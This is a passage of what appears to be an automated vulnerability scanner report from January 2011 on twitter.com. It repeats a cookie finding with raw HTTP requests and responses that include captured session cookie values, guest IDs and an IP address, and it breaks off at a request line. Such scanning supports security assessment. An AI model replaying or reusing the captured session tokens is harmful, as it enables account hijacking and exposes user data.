GET /ryanolson HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:39 GMT Server: hi Status: 200 OK X-Transaction: 1296225039-20499-32646 ETag: "d2211433f4fd1a9e6d92a74f1cc30349" Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT X-Runtime: 0.01104 Content-Type: text/html; charset=utf-8 Content-Length: 54351 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scott_gonzalez HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:38 GMT Server: hi Status: 200 OK X-Transaction: 1296225038-20727-28381 ETag: "e3250478c3ea8a086affa5704f05f05d" Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT X-Runtime: 0.01142 Content-Type: text/html; charset=utf-8 Content-Length: 46926 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:17 GMT Server: hi Status: 200 OK X-Transaction: 1296225016-47325-41983 ETag: "98f573cd8faa541b15eed6e89977a1f8" Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT X-Runtime: 0.07569 Content-Type: text/html; charset=utf-8 Content-Length: 19528 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UyNzM1ZTZiZTAyMzMyZmQ2NWQ3MzBlYmU0MWEz%250AODA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--b3402f9fff3f356babde838d74594264b0e647aa; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sentience HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:17 GMT Server: hi Status: 200 OK X-Transaction: 1296225077-43301-33019 ETag: "6e942a84bdcf3e0bad65268b7ad885b6" Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT X-Runtime: 0.01443 Content-Type: text/html; charset=utf-8 Content-Length: 50391 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sessions/destroy HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 404 Not Found Date: Fri, 28 Jan 2011 14:31:21 GMT Server: hi Status: 404 Not Found X-Transaction: 1296225081-37787-17414 Last-Modified: Fri, 28 Jan 2011 14:31:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9230 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /share HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 403 Forbidden Date: Sat, 29 Jan 2011 01:52:51 GMT Server: hi Status: 403 Forbidden X-Transaction: 1296265971-85703-18326 Last-Modified: Sat, 29 Jan 2011 01:52:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4792 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signup HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 302 Found Date: Fri, 28 Jan 2011 14:25:38 GMT Server: hi Status: 302 Found X-Transaction: 1296224738-57578-22704 Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT Location: https://twitter.com/signup X-Runtime: 0.00757 Content-Type: text/html; charset=utf-8 Content-Length: 92 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="https://twitter.com/signup">redirected</a>.</body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /simplemodal HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:29:05 GMT Server: hi Status: 200 OK X-Transaction: 1296224945-98814-3009 ETag: "203a0c353b6f6f89b45f107452b2203c" Last-Modified: Fri, 28 Jan 2011 14:29:05 GMT X-Runtime: 0.02016 Content-Type: text/html; charset=utf-8 Content-Length: 47151 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitepointdotcom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:34 GMT Server: hi Status: 200 OK X-Transaction: 1296225034-62449-28872 ETag: "9ce581b329f6d5870310b5ced0d02fe8" Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT X-Runtime: 0.01185 Content-Type: text/html; charset=utf-8 Content-Length: 53056 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /slaterusa HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:16 GMT Server: hi Status: 200 OK X-Transaction: 1296225016-47321-52923 ETag: "e18f995e42882bc3925d1122528b563b" Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT X-Runtime: 0.01113 Content-Type: text/html; charset=utf-8 Content-Length: 47275 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /slaterusa/status/28450023532396544 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:16 GMT Server: hi Status: 200 OK X-Transaction: 1296225016-9032-41579 ETag: "2d649e661e9650b58e26ecd35a90c033" Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT X-Runtime: 0.06669 Content-Type: text/html; charset=utf-8 Content-Length: 13654 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vc2xhdGVydXNh%250AL3N0YXR1cy8yODQ1MDAyMzUzMjM5NjU0NDoMY3NyZl9pZCIlMTFkMDY1ODkx%250AZmIzMTRjNTM4NzA5ZWFmNDcwOGFkNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--aa39b3f6965406bbcece36f3eda8aef0cfd70c30; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /statuses/user_timeline/14594657.rss HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:36 GMT Server: hi Status: 200 OK X-Transaction: 1296224736-11803-53712 X-RateLimit-Limit: 150 ETag: "d9f15add89742f23e51649d51653ea0c" Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT X-RateLimit-Remaining: 145 X-Runtime: 0.03892 X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018 Content-Type: application/rss+xml; charset=utf-8 Content-Length: 12107 Pragma: no-cache X-RateLimit-Class: api X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 X-RateLimit-Reset: 1296227305 Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /stubbornella HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:44 GMT Server: hi Status: 200 OK X-Transaction: 1296225044-17908-9667 ETag: "c8f4f53596f1bb2e5586d7d17efcc5c7" Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT X-Runtime: 0.01178 Content-Type: text/html; charset=utf-8 Content-Length: 53443 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
